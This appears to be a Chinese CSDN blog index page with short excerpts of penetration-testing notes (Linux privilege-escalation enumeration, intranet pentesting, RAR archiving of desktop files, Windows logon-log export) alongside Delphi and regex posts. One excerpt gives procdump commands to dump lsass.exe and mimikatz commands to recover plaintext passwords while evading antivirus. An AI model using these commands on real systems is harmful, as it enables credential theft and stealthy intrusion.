bezal-CSDN博客

转载 Linux提权后获取敏感信息方法

（Linux）的提权是怎么一回事：收集 – 枚举，枚举和一些更多的枚举。过程 – 通过数据排序，分析和确定优先次序。搜索 – 知道搜索什么和在哪里可以找到漏洞代码。适应 – 自定义的漏洞，所以它适合。每个系统的工作并不是每一个漏洞“都固定不变”。尝试 – 做好准备,试验和错误。系统类型系统是什么版本?cat /etc/iss

2015-06-25 10:43:44 539

转载 CentOS 运行ifconfig等命令, 提示command not foun

CentOS 运行ifconfig等命令, 提示command not found原因：/bin /sbin等一些的路径并未添加到环境变量中解决方法：vi /home/用户目录/.bash_profile中添加PATH=$PATH:$HOME/bin:/sbin:/binexport PATH

2015-06-11 16:43:56 640

转载 Password hashes dump tools

https://docs.google.com/spreadsheet/ccc?key=0Ak-eXPencMnydGhwR1VvamhlNEljVHlJdVkxZ2RIaWc&utm_source=buffer&buffer_share=ec1fb#gid=0

2015-05-21 10:26:15 377

转载内网渗透方面的总结

T00ls.Net - 低调求发展 - 技术无止境 - Focus On Network Security+ U6 b- M: R" c2 {# I1 S最近在内网渗透方面，发了几个帖子，得到了群里的大牛们的积极帮助，我把大牛们给经验整理了一下，以表示对t00ls的感谢，内网渗透不得不说是门艺术，越学越感觉有意思，俗话说的好，师傅领进门，学习在个人。大牛给的是个思路，条条大道通

2015-05-21 09:32:59 1547

转载 rar命令行参数

rar命令行参数下面是命令参数及详解（转来的）用法: rar - - a添加文件到压缩文件c添加压缩文件注释cf添加文件注释cw写入压缩文件注释到文件d删除压缩文件中的文件e解压压缩文件到当前目录

2015-05-12 10:52:21 5060

原创命令行下文件打包

windows rar1、打包桌面所有文件Rar.exe a -k -r -s -m3 d:\1.rar "C:\Users\bezal\Desktop"2、只打包指定后缀文件只打包doc后缀文件(-n*.doc)Rar.exe a -k -r -s -m3 -tk -n*.doc d:\4.rar "C:\Users\bezal\Deskt

2015-05-12 10:39:28 828

原创 NT6系统命令行下导出用户登录日志

以文本形式输出用户登录日志（100条数目作为数量限制）wevtutil.exe qe security "/q:*[System [(EventID=4624)]]" /f:text /rd:true /c:100 > c:\sys.txt导出用户登录日志wevtutil.exe epl security "/q:*[System [(EventID=4624)]]" c

2015-03-31 00:01:53 2204

原创躲避杀软抓取系统明文密码

所需工具：procdump.exe mimikatz1、使用procdump将lsass.exe转储到文件procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp2、打开mimikatz输入以下语句即可获取明文密码sekurlsa::minidump xxxx_lsass.dmpse

2015-03-25 10:31:20 556

原创正则表达式手册

方括号方括号用于查找某个范围内的字符：表达式描述[abc]查找方括号之间的任何字符。[^abc]查找任何不在方括号之间的字符。[0-9]查找任何从 0 至 9 的数字。[a-z]查找任何从小写 a 到小写 z 的字符。[A-Z]查找任何从大写

2014-04-29 10:51:11 372

原创 Delphi 2010 匿名方法

Type TFunc = reference to procedure (); // 定义匿名方法var Fun: TFunc; // 随用随写begin try Fun:= procedure // 注意本行不能有 ; begin Writeln('reference procedure'); end; F

2013-11-20 15:56:46 613

原创 Delphi DLL 输出函数

procedure Msg();begin writeln('hello world');end;exports Msg name 'hello world'; // 可以通过Name标示符来输出函数的名称

2013-11-20 15:51:21 1651

原创 Delphi DLL 入口点分析

procedure DllEntry(Reason: Integer);begin case Reason of DLL_PROCESS_DETACH: Writeln('Process Detach'); // 进程卸载时 DLL_THREAD_ATTACH: writeln('Thread Attach'); // 线程加载时 D

2013-11-20 15:18:46 1844

bezal的专栏